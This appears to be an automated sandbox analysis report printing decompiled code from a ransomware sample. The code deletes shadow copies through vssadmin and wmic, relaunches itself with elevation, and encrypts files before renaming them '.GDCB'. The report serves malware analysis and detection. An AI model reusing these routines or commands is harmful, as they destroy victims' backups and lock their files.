					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}



















































                                        0x0f9d43f6
                                        0x0f9d4492
                                        0x0f9d449c
                                        0x0f9d44a4
                                        0x0f9d44ac
                                        0x0f9d44b0
                                        0x0f9d44b8
                                        0x0f9d44bc
                                        0x0f9d44c4
                                        0x0f9d44c9
                                        0x0f9d44d1
                                        0x0f9d44d9
                                        0x0f9d44e1
                                        0x0f9d44e9
                                        0x0f9d44f1
                                        0x0f9d44f9
                                        0x0f9d4504
                                        0x0f9d450f
                                        0x0f9d451a
                                        0x0f9d4525
                                        0x0f9d4530
                                        0x0f9d453b
                                        0x0f9d4546
                                        0x0f9d4551
                                        0x0f9d455c
                                        0x0f9d4567
                                        0x0f9d4572
                                        0x0f9d457d
                                        0x0f9d43fc
                                        0x0f9d43fe
                                        0x0f9d4406
                                        0x0f9d440e
                                        0x0f9d4412
                                        0x0f9d441a
                                        0x0f9d441e
                                        0x0f9d4426
                                        0x0f9d442e
                                        0x0f9d4436
                                        0x0f9d443e
                                        0x0f9d4443
                                        0x0f9d444b
                                        0x0f9d4453
                                        0x0f9d445b
                                        0x0f9d4463
                                        0x0f9d446b
                                        0x0f9d4473
                                        0x0f9d447b
                                        0x0f9d4483
                                        0x0f9d4483
                                        0x0f9d4596
                                        0x0f9d45a5
                                        0x0f9d45a9
                                        0x0f9d45b5
                                        0x0f9d45bd
                                        0x0f9d45d3
                                        0x0f9d45db
                                        0x0f9d45dd
                                        0x0f9d45ab
                                        0x0f9d45ab
                                        0x0f9d45ab
                                        0x0f9d45e7
                                        0x0f9d45f5

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F9D459F
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D45B5
                                        • lstrcatW.KERNEL32(00000000,0063005C), ref: 0F9D45BD
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F9D45D3
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D45E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                        • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                        • API String ID: 2684037697-4098772853
                                        • Opcode ID: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction ID: 3d037ce479e92392a6ff62be71b1d1a21a9f280bc8e3ba4ad5c125b82955ba1c
                                        • Opcode Fuzzy Hash: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction Fuzzy Hash: EE4128B0149380DEE3208F119849B5BBFE6BB81B49F10491CF6985A292C7F6858CCF97
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3BE0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109memorysynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D3BE0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F9D3B20(__edx);
				if(_t54 != 0) {
					_t54 = E0F9D3AA0();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}















































                                        0x0f9d3bef
                                        0x0f9d3bf1
                                        0x0f9d3bf8
                                        0x0f9d3bfe
                                        0x0f9d3c05
                                        0x0f9d3c17
                                        0x0f9d3c24
                                        0x0f9d3c2d
                                        0x0f9d3c35
                                        0x0f9d3c3d
                                        0x0f9d3c45
                                        0x0f9d3c4d
                                        0x0f9d3c55
                                        0x0f9d3c5d
                                        0x0f9d3c65
                                        0x0f9d3c6d
                                        0x0f9d3c75
                                        0x0f9d3c7d
                                        0x0f9d3c85
                                        0x0f9d3c8d
                                        0x0f9d3c98
                                        0x0f9d3ca8
                                        0x0f9d3cb1
                                        0x0f9d3cb9
                                        0x0f9d3cc1
                                        0x0f9d3cc9
                                        0x0f9d3cd1
                                        0x0f9d3cd9
                                        0x0f9d3ce1
                                        0x0f9d3ce9
                                        0x0f9d3cf4
                                        0x0f9d3cff
                                        0x0f9d3d0a
                                        0x0f9d3d15
                                        0x0f9d3d20
                                        0x0f9d3d2b
                                        0x0f9d3d36
                                        0x0f9d3d41
                                        0x0f9d3d4c
                                        0x0f9d3d57
                                        0x0f9d3d71
                                        0x0f9d3d73
                                        0x0f9d3d79
                                        0x0f9d3d80
                                        0x0f9d3d8c
                                        0x0f9d3d8e
                                        0x0f9d3d95
                                        0x0f9d3d9d
                                        0x0f9d3da5
                                        0x0f9d3dad
                                        0x0f9d3db7
                                        0x0f9d3dc1
                                        0x0f9d3dc4
                                        0x0f9d3dcb
                                        0x0f9d3dd2
                                        0x0f9d3de0
                                        0x0f9d3de1
                                        0x0f9d3de5
                                        0x00000000
                                        0x00000000
                                        0x0f9d3de7
                                        0x0f9d3deb
                                        0x00000000
                                        0x00000000
                                        0x0f9d3df4
                                        0x00000000
                                        0x0f9d3df4
                                        0x0f9d3e06
                                        0x0f9d3e0f
                                        0x0f9d3e17
                                        0x0f9d3e17
                                        0x0f9d3c05
                                        0x0f9d3dfa
                                        0x0f9d3e00

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                          • Part of subcall function 0F9D3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F9D3C8D
                                        • wsprintfW.USER32 ref: 0F9D3D57
                                        • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F9D3D6B
                                        • GetForegroundWindow.USER32 ref: 0F9D3D80
                                        • ShellExecuteExW.SHELL32(00000000), ref: 0F9D3DE1
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D3DF4
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F9D3E06
                                        • CloseHandle.KERNEL32(?), ref: 0F9D3E0F
                                        • ExitProcess.KERNEL32 ref: 0F9D3E17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                        • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                        • API String ID: 561366689-3790645798
                                        • Opcode ID: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction ID: 1b1e8f97a290841dd6f123cdafe7add18df6feed863d5dc5ad129d7878d62b33
                                        • Opcode Fuzzy Hash: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction Fuzzy Hash: DB516CB0008341DFE3208F51D448B5ABFF9FF84759F104A1DE59886292C7FA91A8CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D35E0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320memorystringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 78%
                                        			E0F9D35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F9D63D0(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v56 = _t162;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf9e04b0]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf9e04b0]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf9e04b0]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F9D82A0( &_v104, 0x10);
				E0F9D82A0( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F9D6530(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F9D6530(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F9D83C0( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F9D89C0(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F9D3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}


















































                                        0x0f9d35eb
                                        0x0f9d35ed
                                        0x0f9d35f1
                                        0x0f9d35ff
                                        0x0f9d3608
                                        0x0f9d3613
                                        0x0f9d361f
                                        0x0f9d3621
                                        0x0f9d363c
                                        0x0f9d363e
                                        0x0f9d3647
                                        0x0f9d364a
                                        0x0f9d3651
                                        0x0f9d3658
                                        0x0f9d3663
                                        0x0f9d3669
                                        0x0f9d3676
                                        0x0f9d367e
                                        0x0f9d367f
                                        0x0f9d368a
                                        0x0f9d368f
                                        0x0f9d3693
                                        0x0f9d369b
                                        0x0f9d36a0
                                        0x0f9d36b0
                                        0x0f9d36c6
                                        0x0f9d36c8
                                        0x0f9d36de
                                        0x0f9d36e4
                                        0x0f9d36e9
                                        0x0f9d36ec
                                        0x0f9d36f1
                                        0x0f9d36f3
                                        0x0f9d36f8
                                        0x0f9d3703
                                        0x0f9d3706
                                        0x0f9d370a
                                        0x0f9d3711
                                        0x0f9d371f
                                        0x0f9d3724
                                        0x0f9d3729
                                        0x0f9d3767
                                        0x0f9d376c
                                        0x0f9d3771
                                        0x0f9d37a0
                                        0x0f9d37a5
                                        0x0f9d37c3
                                        0x0f9d37c5
                                        0x0f9d37cb
                                        0x0f9d380b
                                        0x0f9d3819
                                        0x0f9d381f
                                        0x0f9d3826
                                        0x0f9d3828
                                        0x0f9d382a
                                        0x0f9d382d
                                        0x0f9d3835
                                        0x0f9d3850
                                        0x0f9d3855
                                        0x0f9d385b
                                        0x0f9d3867
                                        0x0f9d386a
                                        0x0f9d386d
                                        0x0f9d386f
                                        0x0f9d3872
                                        0x0f9d3875
                                        0x0f9d387a
                                        0x0f9d3880
                                        0x0f9d3880
                                        0x0f9d3881
                                        0x0f9d3885
                                        0x0f9d3885
                                        0x0f9d389b
                                        0x0f9d38a2
                                        0x0f9d38a7
                                        0x0f9d38aa
                                        0x0f9d38ad
                                        0x0f9d38c2
                                        0x0f9d38da
                                        0x0f9d38df
                                        0x0f9d38e2
                                        0x0f9d38e2
                                        0x0f9d38ef
                                        0x0f9d3902
                                        0x0f9d391d
                                        0x0f9d391f
                                        0x0f9d3924
                                        0x0f9d3924
                                        0x0f9d392f
                                        0x0f9d3935
                                        0x0f9d393a
                                        0x0f9d3832
                                        0x00000000
                                        0x0f9d3832
                                        0x0f9d393a
                                        0x00000000
                                        0x0f9d3855
                                        0x0f9d3950
                                        0x0f9d3956
                                        0x0f9d3967
                                        0x0f9d397c
                                        0x0f9d398c
                                        0x0f9d398c
                                        0x0f9d3993
                                        0x0f9d39a6
                                        0x0f9d39a9
                                        0x0f9d39b5
                                        0x0f9d39c1
                                        0x0f9d39c7
                                        0x0f9d39cf
                                        0x0f9d39cf
                                        0x0f9d39d5
                                        0x0f9d37cd
                                        0x0f9d37db
                                        0x0f9d37e7
                                        0x0f9d37e9
                                        0x0f9d37ec
                                        0x0f9d37f4
                                        0x0f9d37f4
                                        0x0f9d3773
                                        0x0f9d3773
                                        0x0f9d377f
                                        0x0f9d3782
                                        0x0f9d378a
                                        0x0f9d378a
                                        0x0f9d372b
                                        0x0f9d3738
                                        0x0f9d3744
                                        0x0f9d3747
                                        0x0f9d374f
                                        0x0f9d374f
                                        0x0f9d39e2
                                        0x0f9d39ee

                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F9D35F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F9D35FF
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F9D363A
                                        • lstrcpyW.KERNEL32 ref: 0F9D3658
                                        • lstrcatW.KERNEL32(00000000,0047002E), ref: 0F9D3663
                                          • Part of subcall function 0F9D82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                          • Part of subcall function 0F9D82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                          • Part of subcall function 0F9D82A0: GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                          • Part of subcall function 0F9D82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                          • Part of subcall function 0F9D82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36C6
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36F1
                                          • Part of subcall function 0F9D6530: EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                          • Part of subcall function 0F9D6530: GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • MessageBoxA.USER32 ref: 0F9D3738
                                        • GetLastError.KERNEL32 ref: 0F9D3773
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D39E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                        • String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
                                        • API String ID: 1177701972-69869980
                                        • Opcode ID: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction ID: 737e6f7a10b0b45555cb555ef9b09ef4ccc2331dd80173a5a9ed17db930fa17b
                                        • Opcode Fuzzy Hash: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction Fuzzy Hash: F2C18E71E40318BBEB218B90DC46FEEBBB8BF48711F208115F640BA1C2DBB869548B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D40E0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175stringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 363 f9d40e0-f9d40f5 364 f9d43c8-f9d43cd 363->364 365 f9d40fb-f9d4160 call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 363->365 372 f9d4171 365->372 373 f9d4162-f9d416b 365->373 375 f9d4173-f9d41ba call f9d6f40 call f9d8090 lstrlenW 372->375 373->372 374 f9d416d-f9d416f 373->374 374->375 380 f9d41c0-f9d41d2 375->380 380->380 381 f9d41d4 380->381 382 f9d41e0-f9d41ed 381->382 382->382 383 f9d41ef-f9d420c call f9d8090 382->383 386 f9d420e 383->386 387 f9d4286-f9d4375 383->387 390 f9d4210-f9d4236 lstrcpyW lstrlenW 386->390 388 f9d43a8-f9d43c3 VirtualFree call f9d7c10 387->388 389 f9d4377-f9d4392 VirtualAlloc 387->389 388->364 389->388 391 f9d4394-f9d43a5 wsprintfW 389->391 390->387 393 f9d4238-f9d423d 390->393 391->388 394 f9d4243-f9d424b 393->394 395 f9d424d 394->395 396 f9d4277-f9d4284 394->396 397 f9d4250-f9d4256 395->397 396->387 396->394 398 f9d425c-f9d4262 397->398 399 f9d43ce-f9d43d5 397->399 400 f9d426d-f9d4271 398->400 401 f9d4264-f9d426b 398->401 399->390 400->396 400->399 401->397 401->400
                                        C-Code - Quality: 49%
                                        			E0F9D40E0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
